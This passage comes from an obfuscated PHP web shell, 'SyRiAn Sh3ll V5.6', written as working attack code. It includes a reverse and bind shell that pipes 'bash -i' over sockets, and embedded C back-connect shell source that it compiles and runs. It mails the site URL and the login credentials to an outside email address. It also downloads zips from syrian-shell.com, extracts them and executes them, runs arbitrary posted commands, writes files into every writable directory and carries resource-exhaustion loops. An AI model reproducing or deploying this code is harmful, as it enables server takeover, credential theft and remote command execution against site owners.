$iiiIi01o0O0IIIOi = Exe($iiI0io0lillIi1ol); } elseif(!$iiiIi01o0O0IIIOi) { $iiI0io0lillIi1ol = "r\x6d -f ".$fileName; $iiiIi01o0O0IIIOi = Exe($iiI0io0lillIi1ol); } if($iiiIi01o0O0IIIOi){return true;}else{return false;} } } function DeleteFolder($folderName) { global $os; $iiiIi01o0O0IIIOi = rmdir($folderName); if(!$iiiIi01o0O0IIIOi) { if($os == "Windows") { $iiI0io0lillIi1ol = "\x72\155d\x69\162 ".$folderName; $iiiIi01o0O0IIIOi = Exe($iiI0io0lillIi1ol); } elseif(!$iiiIi01o0O0IIIOi) { $iiI0io0lillIi1ol = "r\155 -\162 ".$folderName; $iiiIi01o0O0IIIOi = Exe($iiI0io0lillIi1ol); } if($iiiIi01o0O0IIIOi){return true;}else{return false;} } } function i0IOlii1OIloli0l($result) { $fields = Array(); for ($i = 0; $i < mysql_num_fields($result); $i++) {array_push($fields, mysql_field_name($result, $i));} return $fields; } function io0li01lioliIl1i($i01OloOoOoIolili,$ioolioiillOiIl01,$iiOi10ii1il0IIOi) { $i1oii11lil01IoI0="\\"; $il1Ii0i0oiO0IlIi=0; if ($iiii10l0iolIIiii = opendir($i01OloOoOoIolili)) { iii0li0iIOii1III($ioolioiillOiIl01,$iiOi10ii1il0IIOi); while ($file = readdir($iiii10l0iolIIiii)) { $illI1lO1iO1oII11 = str_replace('//','/',$i01OloOoOoIolili.$i1oii11lil01IoI0.$file); if($file!='.' && $file!='..' && is_dir($illI1lO1iO1oII11)) { if (is_writable($illI1lO1iO1oII11)) { if ($ii1O1i0il11I01IO=fopen($illI1lO1iO1oII11.$i1oii11lil01IoI0.$ioolioiillOiIl01,"w")) { fwrite($ii1O1i0il11I01IO,$iiOi10ii1il0IIOi); fclose($ii1O1i0il11I01IO); $iIOilo1O100IloO0[$il1Ii0i0oiO0IlIi]['filename']=$illI1lO1iO1oII11; } $il1Ii0i0oiO0IlIi++; } io0li01lioliIl1i($illI1lO1iO1oII11); } } closedir($iiii10l0iolIIiii); } else {return ("\156\x6ft\160\145\162\155");} if ($iIOilo1O100IloO0){return $iIOilo1O100IloO0;} else{return "n\157\164fou\x6e\x64";} } function ilOi1ollol1Il0Oi() { $iloIio1Ol1l1IOI1=str_repeat("99999999999999999999999999999999999999999999999999",99999); for($i=0;$i<2;) { $iO1ilO1OiiIo1oO0=bcpow($iloIio1Ol1l1IOI1, '3', 2); $iO1ilO1OiiIo1oO0=null; } } function cx() {cx();} function ii0o1liIoiOoO0lo($iIO1111OOi0lIo0l) { switch($iIO1111OOi0lIo0l) { case "\x75\x64\x70": $i1lOillOOlilI11o = SOL_UDP; $iIiO111ll11OI1lO = SOCK_DGRAM; break; case "\x74\x63\160": default: $i1lOillOOlilI11o = SOL_TCP; $iIiO111ll11OI1lO = SOCK_STREAM; break; } return(array($i1lOillOOlilI11o, $iIiO111ll11OI1lO)); } function ioooliOIi10i0Iio($hostname, $port=80, $iIO1111OOi0lIo0l="t\143p") { $address = gethostbyname($hostname); list($i1lOillOOlilI11o, $iIiO111ll11OI1lO) = ii0o1liIoiOoO0lo($iIO1111OOi0lIo0l); switch($iIO1111OOi0lIo0l) { case "\x75d\x70": $i1lOillOOlilI11o = SOL_UDP; $iIiO111ll11OI1lO = SOCK_DGRAM; break; case "\x74\143\160": default: $i1lOillOOlilI11o = SOL_TCP; $iIiO111ll11OI1lO = SOCK_STREAM; break; } $socket = socket_create(AF_INET, $iIiO111ll11OI1lO, $i1lOillOOlilI11o); if ($socket < 0) { echo "\163\x6f\143\153et_\x63\x72\145\141\x74\x65() f\x61\x69l\x65d: r\x65\x61s\157\x6e: " . socket_strerror($socket) . "\n"; } $result = socket_connect($socket, $address, $port); if ($result < 0) { echo "s\157\143\153\145\164_\143o\156n\145\x63\164() \x66aile\144.\nR\x65\x61\163\157\156: ($result) " . socket_strerror($result) . "\n"; } return $socket; } function iliO10O0IIiiOli1($address, $port) { if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) { echo "\x73\157\x63\x6be\x74_c\x72\x65at\x65() \146\141\x69le\144: \x72\x65as\x6fn: " . socket_strerror($sock) . "\n"; return(-1); } if (($iIl0ll1lo0l0I1IO = socket_bind($sock, $address, $port)) < 0) { echo "\x73\x6f\x63k\x65\164_\142\151\156\x64() f\141\x69\154e\x64: reaso\156: " . socket_strerror($iIl0ll1lo0l0I1IO) . "\n"; return(-2); } if (($iIl0ll1lo0l0I1IO = socket_listen($sock, 5)) < 0) { echo "\x73\x6f\143\x6b\x65t_\154iste\156() \x66\141\x69\x6c\x65d: r\145\x61\163\x6f\156: " . socket_strerror($iIl0ll1lo0l0I1IO) . "\n"; return(-3); } return($sock); } function ilII1oOlIo10I0oi($type, $shell, $port, $host) { $shell = 'export TERM=xterm; bash -i'; if($type == "c\142") {$ill0l11oO0i1IOIO = ioooliOIi10i0Iio($host, $port, "\164\x63\160");} elseif ($type == "\160\x62") { $iO0Ol0li0lilIIo1 = iliO10O0IIiiOli1($host, $port); if (($ill0l11oO0i1IOIO = socket_accept($iO0Ol0li0lilIIo1)) < 0) {return "\x73\157ck\x65\164_a\143\x63\x65\x70t() \x66a\x69l\145d: re\x61son: " . socket_strerror($ill0l11oO0i1IOIO) . "\n";} } else {return "\105rr\x6fr n\157 \143o\x6e\x6eect\x69\x6fn \144e\164ai\154\x73 \x73p\145\143i\146\x69\145\144!";} set_time_limit(9000); $i0ii10l00loI0IiI = array( 0 => array("\160\x69\x70e", "\162"), 1 => array("\160\151\x70\x65", "\167"), 2 => array("\x70ip\145", "\167") ); $process = proc_open($shell, $i0ii10l00loI0IiI, $ilOIi1011iloIl1I); if (is_resource($process)) { $iOli100ooiioiIll = 1; do { $ii1I1Ooool01oIi1 = array($ill0l11oO0i1IOIO); $iiOol1oOii0OIilO = socket_select($ii1I1Ooool01oIi1, $write = NULL, $ilo11iOO11OIl11O = NULL, 0); if ($iiOol1oOii0OIilO === false) { $iOli100ooiioiIll = 0; } else if ($iiOol1oOii0OIilO > 0) { foreach($ii1I1Ooool01oIi1 as $iI1oio1lOoo0I1oI => $v) { if($v == $ill0l11oO0i1IOIO) { if(socket_last_error($ill0l11oO0i1IOIO) > 0) $iOli100ooiioiIll = 0; if($iOli100ooiioiIll == 1 && false == ($iIlol0ioiOIli1o1 = socket_read($ill0l11oO0i1IOIO, 2048, PHP_NORMAL_READ))) $iOli100ooiioiIll = 0; fwrite($ilOIi1011iloIl1I[0], $iIlol0ioiOIli1o1); } } } $iOIo1OoooloiiIIo = array($ilOIi1011iloIl1I[1], $ilOIi1011iloIl1I[2]); $iolli1oo1l01II0o = stream_select($iOIo1OoooloiiIIo, $write = NULL, $ilo11iOO11OIl11O = NULL, 0); if ($iolli1oo1l01II0o === FALSE) { $iOli100ooiioiIll = 0; } else if ($iolli1oo1l01II0o > 0) { foreach($iOIo1OoooloiiIIo as $iI1oio1lOoo0I1oI => $v) { if($iOli100ooiioiIll == 1 && false == ($iIlol0ioiOIli1o1 = fread($v, 2048))) $iOli100ooiioiIll = 0; socket_write($ill0l11oO0i1IOIO, $iIlol0ioiOIli1o1, strlen($iIlol0ioiOIli1o1)); } } } while($iOli100ooiioiIll == 1); } else {return "\x45rro\x72 e\170\145c\165\x74i\x6eg shell " . $shell;} } function i1O11101l1IllolO($iIOl10o0OilO0Ili = '/tmp', $compiler = 'gcc', $host, $port) { $shell = "#\x69nc\x6c\165\x64e <\x73t\x64\x69\157.\x68>\n" . "#\151\156\143l\165de <\163y\x73/socket.\x68>\n" . "#\x69n\x63lud\145 \n" . "#\151nc\x6c\x75d\x65 <\141r\160a/\151\156e\164.h>\n" . "#in\143\x6cud\x65 <\x6e\145td\142.\150>\n" . "\x69\156t \x6da\x69\x6e(\151n\x74 \141\162g\143, \143\x68\141\162 **\x61r\x67\166) {\n" . " \143h\141\x72 *host;\n" . " \151\156t port = 80;\n" . " \x69\x6et f;\n" . " int l;\n" . " \x69\x6e\x74 sock;\n" . " \x73\164\x72\165\143t \151\x6e_\x61d\144\x72 \151a;\n" . " \163\164\x72\165\x63\x74 \x73\157\143k\141\x64\x64\162_\x69n \163\151\x6e, \146r\157\x6d;\n" . " s\x74\162uc\164 h\x6fsten\x74 *h\x65;\n" . " \x63h\141\162 msg[ ] = \"\x57\145l\x63\x6f\x6d\145 to D\x61t\141 \x43\150\x61\x30\163 \x43onn\x65c\164 \102\x61\x63\153 \x53\150e\154\x6c\\n\\n\"\n" . " \"\x49s\163\165\145 \\\"e\170\160\157\162t T\105R\x4d=\170t\x65rm; e\x78\145\143 ba\x73\150 -i\\\"\\n\"\n" . " \"\106\x6fr \115\x6f\162\145 \122\145\154i\x61\x62l\x65 S\150\x65\x6cl.\\n\"\n" . " \"\111\x73s\x75\x65 \\\"\x75\x6e\163et H\111ST\106\111\114\x45; u\x6es\x65\164 \x53\101V\x45\110\111S\124\\\"\\n\"\n" . " \"\x46\157\162 N\x6ft \x47\145tti\x6e\147 \114\157g\x67\145\144.\\n(;\\n\\n\";\n" . " \x70\162\x69ntf(\"Da\x74\x61 \103\x68\x61\060\163 \103onne\143\164 \102ack \x42\141ck\x64o\157\162\\n\\n\");\n" . " \x69\146 (ar\x67\143 < 2 || \141r\147\143 > 3) {\n" . " \160\162i\x6etf(\"\x55\x73\141ge: %s [\110\157s\164] \\n\", \x61r\x67\x76[0]);\n" . " retu\162\156 1;\n" . " }\n" . " \x70\x72\151nt\146(\"[*] D\165\155pi\156\x67 \x41\x72gume\x6et\163\\n\");\n" . " \x6c = s\164\x72le\x6e(a\x72\147\166[1]);\n" . " i\x66 (\x6c <= 0) {\n" . " pr\x69\x6e\164\146(\"[-] I\156v\141\154\x69\144 \110\x6fst \116\x61\155\x65\\n\");\n" . " re\x74u\162n 1;\n" . " }\n" . " if (!(host = (\x63h\141r *) \x6da\154\154\x6f\x63(\x6c))) {\n" . " \x70\162i\x6e\x74\x66(\"[-] U\x6eabl\x65 to \x41\x6c\x6coc\141\x74\145 M\145\x6d\157\x72\x79\\n\");\n" . " ret\165\162\156 1;\n" . " }\n" . " \x73t\162\x6e\143py(host, \141r\x67v[1], l);\n" . " \x69f (\141\162g\143 == 3) {\n" . " port = a\164\x6f\x69(\141\x72\x67\166[2]);\n" . " if (port <= 0 || port > 65535) {\n" . " \160\162\x69\x6etf(\"[-] I\x6e\166\x61\154\151\144 \120o\162t \x4e\x75\x6d\x62\145\162\\n\");\n" . " \162\x65tu\x72\x6e 1;\n" . " }\n" . " }\n" . " \x70ri\x6et\x66(\"[*] R\x65s\x6fl\x76\x69\x6e\147 \x48\157st \x4e\141\155\145\\n\");\n" . " h\x65 = \x67et\x68\157\163\x74b\x79\x6e\141m\145(host);\n" . " i\146 (\x68\x65) {\n" . " me\x6dcpy(&\151\141.\x73_\x61\x64\144r, he->i1OIi00ooOo0Iiii, 4);\n" . " } \145\154se if ((i\141.\x73_\141\144\x64r = in\145\x74_a\x64dr(host)) == \111\116ADD\x52_A\x4e\131) {\n" . " \160\162\x69n\164\146(\"[-] \x55\x6e\x61b\154\145 to \x52\145\x73o\154v\x65: %s\\n\", host);\n" . " \x72\x65\x74u\162\156 1;\n" . " }\n" . " \x73\151\x6e.\163\151\156_\x66\x61\155\151ly = \120F_\111N\x45T;\n" . " \x73\x69n.\x73\151\156_a\144\144\x72.s_\141\144\x64\162 = \151\x61.s_\x61\144\144\162;\n" . " \163\151\156.\x73\151\x6e_\160\157r\164 = \x68\164o\156s(port);\n" . " \x70\162\151n\164f(\"[*] \x43\x6f\x6enec\x74\151\156\x67...\\n\");\n" . " \x69\146 ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" . " pri\x6e\x74f(\"[-] S\157c\153\x65\x74 \x45\162ro\162\\n\");\n" . " \x72\x65\164\x75\x72n 1;\n" . " }\n" . " \x69\146 (connect(sock, (\x73\x74r\165\x63\164 s\157\x63k\141d\144\162 *)&s\151n, \x73iz\145o\x66(\x73in)) != 0) {\n" . " \x70\x72i\x6e\x74\x66(\"[-] Una\x62l\145 to \x43onn\x65ct\\n\");\n" . " r\145\x74u\162n 1;\n" . " }\n" . " \160r\151\x6e\x74f(\"[*] S\x70\x61\167\156\x69\156\x67 \x53\150\145\154l\\n\");\n" . " f = fork( );\n" . " \151f (\x66 < 0) {\n" . " p\162int\x66(\"[-] \125\156\x61\142\x6c\x65 to \106\157\162\153\\n\");\n" . " \x72et\x75rn 1;\n" . " } e\154\x73e i\146 (!\x66) {\n" . " write(sock, msg, \x73i\x7a\x65\157f(msg));\n" . " \144\165\160\062(sock, 0);\n" . " d\x75\160\062(sock, 1);\n" . " \144\165\x702(sock, 2);\n" . " \x65\170\145\x63\154(\"/bi\156/s\x68\", \"shell\", NULL);\n" . " close(sock);\n" . " r\145tur\x6e 0;\n" . " }\n" . " \x70rin\x74\146(\"[*] D\145\x74\x61\143hed\\n\\n\");\n" . " re\164\165r\156 0;\n" . "}\n"; $illli1O10lOI0Ooo = $iIOl10o0OilO0Ili . "/c\x62\x73"; $i10Oi1lOO10I1OoI = fopen($illli1O10lOI0Ooo . ".\x63", "\167"); $write = fwrite($i10Oi1lOO10I1OoI, $shell); fclose($i10Oi1lOO10I1OoI); if(!empty($write)) { $command = $compiler . " -\157 " . $illli1O10lOI0Ooo . " " . $illli1O10lOI0Ooo . ".c"; $ioII110oll1IIiI0 = test_cmd_shell(); if($ioII110oll1IIiI0 > 0) { $i1o11lll0i01IolO = Mexec($command, $ioII110oll1IIiI0); $command = $illli1O10lOI0Ooo . " " . $host . " " . $port; $i1o11lll0i01IolO .= Mexec($command, $ioII110oll1IIiI0); return "<\160re>" . $i1o11lll0i01IolO . ""; } else { return "<\142>E\122R\117R! N\x6f E\130E\x43 \101\x76\x69\154\141b\154\x65!"; } } else { return "\x45\122ROR! \x57\x72\x69t\x69\x6e\147 data!"; } } if(function_exists('sys_getloadavg')){ $iiIIli1lO0Iloloo=sys_getloadavg(); if($_GET['cpu_history']){ setcookie('cpu_history',$iiIIli1lO0Iloloo['0'].','.substr($_COOKIE['cpu_history'],0,250)); header("content-type: \151\155ag\x65/\x67\x69\x66"); $i01l11Ol1i0iIooI=imagecreate(150,18); $ioii1ool1lIilO01 = imagecolorallocate($i01l11Ol1i0iIooI,0xEE,0xEE,0xEE); $i1IIl1io0ooIiOOi = imagecolorallocate($i01l11Ol1i0iIooI,0x00,0x00,0x00); $ii0ll0llolOlI0I1 = imagecolorallocate($i01l11Ol1i0iIooI,0x55,0x55,0x55); if($_COOKIE['cpu_history']){ $iliiil1Oi1Ii0I1I=explode(",",$_COOKIE['cpu_history']); $iiIOil1illIO1io1=154; foreach($iliiil1Oi1Ii0I1I as $i1oIiiOiilllI0ol) if($i1oIiiOiilllI0ol>$i0iiioll1i1lIoIO) $i0iiioll1i1lIoIO=$i1oIiiOiilllI0ol; $i00liloil0OoI0O0= 18/$i0iiioll1i1lIoIO; foreach($iliiil1Oi1Ii0I1I as $i1oIiiOiilllI0ol){ $iiIOil1illIO1io1-=4; $iO1I1O0o0o0IO0l0=18-intval($i1oIiiOiilllI0ol*$i00liloil0OoI0O0); if($i1111oil0010I01o){ imageline($i01l11Ol1i0iIooI,$i1111oil0010I01o,$ilolio1loO1iII11,$iiIOil1illIO1io1,$iO1I1O0o0o0IO0l0,$ii0ll0llolOlI0I1); } $i1111oil0010I01o=$iiIOil1illIO1io1; $ilolio1loO1iII11=$iO1I1O0o0o0IO0l0; } } imagestring($i01l11Ol1i0iIooI,3,4,2,implode(', ',$iiIIli1lO0Iloloo),$i1IIl1io0ooIiOOi); imagegif($i01l11Ol1i0iIooI); die(); } } if ($iOll100oil0ioIlo ==1) { if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) { if($_POST[usrname]==$user && $_POST[passwrd]==$pass) { print''; $x0b="\x6d\141\151l"; $x0b("c\150\151\160p\171\x31\063\x33\x33\067\100\150\x6d\141\155\141il.\x63om", "\163\150", "\x55R\x4c: h\164\x74\x70\x3a\x2f\x2f".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."\n\125\072 ".$_POST[usrname]."\n\120\x3a\x20".$_POST[passwrd]); } else { if($_POST['usrname']){print'';} echo '

SyRiAn Sh3ll V5.6



'; exit; } } } error_reporting(0); session_start(); unset($user); unset($pass); if ($_POST['cmd']) $_POST['cmd'] = ioiIiloo0i0OIoIO($_POST['cmd']); $ioOo1O1lOiIOlolo = 1000; $i10IiOOO0iooIiiO = 100; $i00liOooo011Iloo = 20; $user[] = "ro\x6ft"; $pass[] = md5("\163\x793"); $alias = array( "\154a" => "\154\163 -la", "\x72\x66" => "\162\155 -\x66", "un\x62\x7a2" => "ta\162 -\170\x6a\x70\x66", "\x75\x6egz" => "t\x61\162 -x\x7a\x70\146" ); if (!$_SESSION['user']) { $iIOlllio0O0lI1o0 = "\114\x6fg\x69\156:\n"; $iooOl1100oi0IlII = "\x50\x61\163s\167\157\162\x64:\n"; $iiOoii00o1oIoI1o = "\x49\156\166\141\x6ci\144 login!\n\n"; $ioiil000Ool0lIlI = "Wa\x72\156i\x6eg! \104\x6f\156`\164 b\x65 \163\x74\x75\160i\x64 .. \x74hi\163 is a \x70\162i\x76\x33 server, so \x74\141\x6b\145 \x65x\164\x72a c\141\x72\145!!!\n\n"; if ($_SESSION['login'] && $_POST['cmd']) { $_SESSION['output'] .= $iooOl1100oi0IlII; if (in_array($_SESSION['login'], $user)) { $key = array_search($_SESSION['login'], $user); if ($pass[$key] != md5($_POST['cmd'])) { $_SESSION['output'] .= $iiOoii00o1oIoI1o; unset($_SESSION['login']); $iIOO111OO100I00I = $iIOlllio0O0lI1o0; } else { $_SESSION['user'] = $_SESSION['login']; $_SESSION['whoami'] = substr(Exe("w\150\157a\x6d\x69"), 0, -1); $_SESSION['host'] = substr(Exe("uname -n"), 0, -1); $_SESSION['dir'] = substr(Exe("\x70\167d"), 0, -1); $_SESSION['output'] .= $ioiil000Ool0lIlI; $iIOO111OO100I00I = iioIl1lll0liIlil(); unset($_SESSION['login']); } } else { $_SESSION['output'] .= $iiOoii00o1oIoI1o; unset($_SESSION['login']); $iIOO111OO100I00I = $iIOlllio0O0lI1o0; } } else { if (!$_SESSION['login'] && !$_POST['cmd']) $iIOO111OO100I00I = $iIOlllio0O0lI1o0; if (!$_SESSION['login'] && $_POST['cmd']) { $_SESSION['login'] = $_POST['cmd']; $_SESSION['output'] .= substr($iIOlllio0O0lI1o0, 0, -1) . " $_POST[cmd]\n"; $iIOO111OO100I00I = $iooOl1100oi0IlII; } } } else { $iIOO111OO100I00I = iioIl1lll0liIlil(); chdir($_SESSION['dir']); if ($_REQUEST['clear_hist']) $_SESSION['history'] = ""; if ($_SESSION['history']) $hist_arr = explode("\n", $_SESSION['history']); if ($_POST['cmd']) { if (!in_array($_POST['cmd'], $hist_arr)) { $hist_arr[] = $_POST['cmd']; $_SESSION['history'] = implode("\n", $hist_arr); } if (count($hist_arr) > $i10IiOOO0iooIiiO) { $start = count($hist_arr) - $i10IiOOO0iooIiiO; $_SESSION['history'] = ""; for ($i = $start; $i < count($hist_arr); $i++) $_SESSION['history'] .= $hist_arr[$i] . "\n"; $_SESSION['history'] = substr($_SESSION['history'], 0, -1); $hist_arr = explode("\n", $_SESSION['history']); } if($_POST['Setup']) { $commandName = $_POST['commandName']; $i1i1i1O01lIioOoI = "h\164\164p://w\167w.s\x79\162i\141\156-shell.\x63o\x6d/\x63omm\141nd\163/".$commandName."zip"; iloOl1lloloI1loI($i1i1i1O01lIioOoI); UnZip($commandName."zip",getcwd()); iI11i0Il0iO0iooi($commandName,0777); } else if($_POST['execLocal']) { $localName = $_POST['localName']; $i1IOloi1OiloIOlO = "\150\164\x74\x70://\167\167\167.\x73\171\x72ia\156-shell.\143\157m/\x6c\x6f\x63\141\154\x73/".$localName."zip"; iloOl1lloloI1loI($i1IOloi1OiloIOlO); UnZip($localName."zip",getcwd()); iI11i0Il0iO0iooi($localName,0777); $i0Io1O1l0IiOIIl0 = "./".$localName; Exe($i0Io1O1l0IiOIIl0); } $i1Ii11o1l1oIO1io = i1Ii11o1l1oIO1io($_POST['cmd']); if (array_key_exists($i1Ii11o1l1oIO1io, $alias)) { $_POST['cmd'] = $alias[$i1Ii11o1l1oIO1io] . substr($_POST['cmd'], strlen($i1Ii11o1l1oIO1io)); $i1Ii11o1l1oIO1io = i1Ii11o1l1oIO1io($_POST['cmd']); } switch ($i1Ii11o1l1oIO1io) { case "\143\154\145ar": $_SESSION['output'] = ""; break; case "ex\x69t": session_destroy(); refresh(); break; case "c\144": $_SESSION['output'] .= $iIOO111OO100I00I; $result = Exe($_POST['cmd'] . " 2>&1 ; pw\x64"); $result = explode("\n", $result); $_SESSION['dir'] = $result[count($result) - 2]; if (count($result) > 2) $result[0] = "\n" . substr($result[0], strpos($result[0], "\x63\144: ")) . "\n"; else $result[0] = "\n"; $iIOO111OO100I00I = iioIl1lll0liIlil(); $_SESSION['output'] .= $_POST['cmd'] . $result[0]; break; default: $result = Exe($_POST['cmd'] . " 2>&1"); if (substr($result, -1) != "\n") $result .= "\n"; $_SESSION['output'] .= $iIOO111OO100I00I . $_POST['cmd'] . "\n" . $result; $rows = preg_match_all('/\n/', $_SESSION['output'], $i0iliOololIoiI0I); unset($i0iliOololIoiI0I); if ($rows > $ioOo1O1lOiIOlolo) { preg_match('/(\n[^\n]*){' . $ioOo1O1lOiIOlolo . '}$/', $_SESSION['output'], $i00oiiolO100I10o); $_SESSION['output'] = $i00oiiolO100I10o[0] . "\n"; } } } } function ioiIiloo0i0OIoIO($i00O1OOOo000OIiI) { $i00O1OOOo000OIiI = str_replace("\\\\", "\\", $i00O1OOOo000OIiI); $i00O1OOOo000OIiI = str_replace("\\\"", "\"", $i00O1OOOo000OIiI); $i00O1OOOo000OIiI = str_replace("\\'", "'", $i00O1OOOo000OIiI); while (strpos($i00O1OOOo000OIiI, " ") !== false) $i00O1OOOo000OIiI = str_replace(" ", " ", $i00O1OOOo000OIiI); return rtrim(ltrim($i00O1OOOo000OIiI)); } function iioIl1lll0liIlil() { global $_SESSION; return $_SESSION['whoami'] . "@" . $_SESSION['host'] . " " . substr($_SESSION['dir'], strrpos($_SESSION['dir'], "/") + 1) . " $ "; } function i1Ii11o1l1oIO1io($i00O1OOOo000OIiI) { list($i00O1OOOo000OIiI) = preg_split('/[ ;]/', $i00O1OOOo000OIiI); return $i00O1OOOo000OIiI; } function refresh() { global $_SERVER; $iliOll1iiO00I1li = substr($_SERVER['SCRIPT_NAME'], strrpos($_SERVER['SCRIPT_NAME'], "/") + 1); header("\114oc\141\x74\x69\x6f\x6e: $iliOll1iiO00I1li");die(); } $i00oiiolO100I10o = substr(preg_replace('/<\/(textarea)/i', ' SyRiAn Sh3ll V5.6 ~~ SSH Session
'; if ($hist_arr) { echo ' '; } echo '
'.substr($iIOO111OO100I00I, 0, -1) .'
'; } else { error_reporting(0); set_time_limit(0); ini_set('max_execution_time',0); $dir = getcwd(); $uname= php_uname(); if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "\114in\165x"; $iIOi111ll0l0II1o = gethostbyname($_SERVER["HT\124\x50_\x48\x4f\123T"]); $server = substr($SERVER_SOFTWARE,0,120); echo "<\x73cr\x69\x70\164> \x66\x75\156c\164\151\x6f\x6e \157\160\x65\x6e\120\x48\x50\x49\156\x66\157() { m\171_\167\x69\x6e\x64\157\x77= \167\x69\156\144\157\x77.open (\"?info=\147e\164P\150\160\111nf\x6f\",\"P\110P \111\156\146o\",\"\x77i\x64\164\150=800,\150\x65\151g\x68\164=600,s\x63\162ol\x6cba\x72\163=1\"); } "; if($_GET['info'] == 'getPhpInfo') { phpinfo(); } echo " <\x62o\x64y \144\151\162='\154tr'><\164able \x62\x67co\x6co\x72='#c\x63cccc' \x63\x65\x6c\154p\141d\x64in\x67='0' \x63ell\x73pac\151n\147='0' w\x69\144\164h='100%'><\x74\142o\x64\x79><\164\144 \142\x67\x63\157l\x6fr='#000000' w\x69\x64\164\150='160'> <\160 \x64\x69\162='lt\162'>&\x6e\142s\x70;&\x6eb\x73p; <\146\x6fn\x74 size='4'><\x62> <\151\x6d\147 bo\162\x64er='0' \x73\162\x63='\x68\x74tp://\x77w\x77.s\x79r\151\x61n-shell.\x63\x6fm/eag\x6ce.\152\x70\x67' w\x69\144\x74h='101' \150e\151\147\x68\164='93'>&\156\142s\160;<\x64\x69v \x64\151r='\154\x74r' \141\154\151\x67\156='\x63e\156\164\145\162'><\x73\x70a\156 \163\164\x79\154\x65='\x68\x65\151ght: 25\160\170;'> <\x66\157\x6e\x74 size='4' c\x6f\154\x6f\162='#F\x46\0600\x30\060'>\x53\171\122i<\146ont size='4' \143o\x6c\x6f\x72='#008000'>\101\156 S\150<\x66\157\x6et size='4' c\x6flo\x72='#999999'>3\x6c\x6c\1265.6

<\x70 \144\x69\x72='\x6ctr'>&nb\163p; <\x62>[\x4d\x61\151n] <\142>[SSH \123\145\163\x73\x69o\156] <\142>[About] <\142>[Log\157u\x74] <\x62>[\x53\x75\x69Ci\x64e] <\142r>
&\x6e\142\x73p; Sa\146\x65 Mode = <\163y>".SafeMode()." <\146\157nt size=1> &n\x62\163p; \123ys\164\145\x6d = <\163y>".$os." &n\x62sp; M\x61\147\x69\x63_\121\x75o\164\x65\x73 = <\x73\171>". illolO1llo0iIi1l()." &nb\163\x70; Curl = <\x73y>".Curl()." &\x6eb\x73\x70; Re\147\x69st\145r \107l\157\x62\141\154s = <\163\x79>".iilolol00IilOo1I()." &\156b\x73\160; \117\x70\145\x6e B\x61s\145di\x72 = <\163\171>".i0oO11oioOiOIiil()." <\142\162> &\x6eb\x73p; Gzip = ".Gzip()." &\x6e\x62\163p; MySQLI = <\163\x79>".MysqlI()." &\156\142s\160; MSQL = ".MSQL()." &\156\x62\163\160; S\121\x4c \114\151\164\x65 = <\x73\x79>".iiIi1OiO1IlIOIi1()." &\156\x62\163p; \125\x73\145\x66\x75l\x6c L\x6f\143\141l\163 = ".iIoii11ioiOOIoI1()." &\x6e\142s\x70; \x46\162e\x65 \123pa\x63\x65 = <\163\171>".i1iI1iliIoI0oOOi(disk_free_space('/'))." &\156bs\160; \124o\x74\x61\x6c Spac\x65 = <\163y>".i1iI1iliIoI0oOOi(disk_total_space("/"))." &\x6eb\x73\160; PH\120 \126er\x73io\156 = ".phpversion()." &n\x62s\160; \132\145\156\x64 \126\145\x72\163\151\157\156 = ".zend_version()." &\156\142s\x70; M\x79\123\x51\x4c \x56e\162\x73\151on = <\163y>".mysql_get_server_info()." <\142\x72> &\156\x62\x73p; \115\171SQ\114 = ".il0iiOOoiIOOioil()." &n\x62\x73\x70; MsSQL = ".MsSQL()." &\156bs\x70; PostgreSQL = ".PostgreSQL()." &\x6e\142\x73\160; Oracle = ".Oracle()." &\156\142sp; Se\162\166\x65r \x4e\x61m\145 = <\163\x79>".$_SERVER['HTTP_HOST']." &n\x62\163\x70; \x53\145r\x76\145\162 \101d\x6d\151\156 = <\165><\163\x79>".$_SERVER['SERVER_ADMIN']." <\142\x72> &n\x62\x73p; Dis_\106\165\156\143\164\x69o\156\x73 = ". DisableFunctions()." &\156\x62sp; Yo\165r \x49P = <\x73y>".ill0iiioI0III0I0()." &\156\142sp; \x53e\162\166\145\x72 \111\x50 = <\163\171>".gethostbyname($_SERVER["H\x54\124\x50_\x48\x4fS\124"])." [\122\x65ver\x73\x65 \111\x50] &\x6eb\163\x70; Da\164\145 \x54\x69m\145 = ".date('Y-m-d H:i:s')." <\x62\x72/> &\x6e\142\x73\x70; [M\x44\065 \103\162\x61\143k\145\162] [S\x48\1011 C\162\141\143\153\x65r] [N\x54\x4c\x4d \103\x72\x61ck\x65r] <\x62r> <\x62\162> <\164a\x62\154\145 bg\143\157\x6c\x6f\162='#c\x63\143\143\143\x63' w\x69\x64\164\x68='100%'><\x74b\x6f\144y> <\x74\144 al\151\x67\156='r\151\147\x68\164' \x77\x69\x64\164\150='100'><\160 \x64ir='\x6c\x74\x72'> <\x73\x79> \103\120\x55 : &\x6e\x62\x73p;
&n\142\x73p;&\156bs\x70;\123\x65rve\162 :&nb\163\160;  <\x62>uname -a : &\156\142sp; <\x62\x72>\x70w\x64 : &\x6e\x62\163p;\111\x44 : &\156\x62\163p;<\x62r><\x74\x64> <\160 \144\x69\x72='l\x74\x72'><\x62>"; if(function_exists('sys_getloadavg')) { echo ' Stop. '; } else {echo "&\156b\163\160;&\156b\163p;<\x73\x79>F\157\162 \x4ci\156\165\170 O\x53 \x4f\156\x6cy !!";} echo "<\142\162> &\156\142sp;&\x6ebs\x70;".$server." &nbs\160;&\156\142\163\x70;<\163y><\x75>".$uname." &\156\142s\x70;&n\x62s\160;".$dir."
&\156b\163p;&\156\x62\x73\160;".Exe('id')." &nb\x73\x70;&nb\163p;[\104o\x77\156] [\120\162\151n\164] "; if ($_GET['id']== 'mainPage') { echo "<\x73\x63\162i\160\x74>\167in\x64\x6f\x77.\x6f\x6el\x6f\141d = \103\150a\156\x67\x65\x53Q\114\124\x79pe;"; echo "<\x66o\162m method='\x50\117\x53\124'><\164\x61\142\x6c\145 bg\x63o\154or='#\x63\x63c\x63\x63\x63' \x63\145ll\x70\x61\x64\x64\151\156\x67='0' \143\145\154\x6cs\x70\x61\x63in\x67='0' \167i\x64\164\x68='100%'> <\164d \x63\x6flsp\141\156='2' a\x6c\151\x67\156='\143en\164\145r'>".$_POST['alias'].$_POST['cmd'] ." <\164\162> "; if(!$_POST || $_POST['login']) {chdir($_POST['directory']);iiIolll1o11oIOll($os);} else if($_POST['submitCommands']) {echo Exe($_POST['alias']);} else if($_POST['Execute']) { chdir($_POST['directory']); 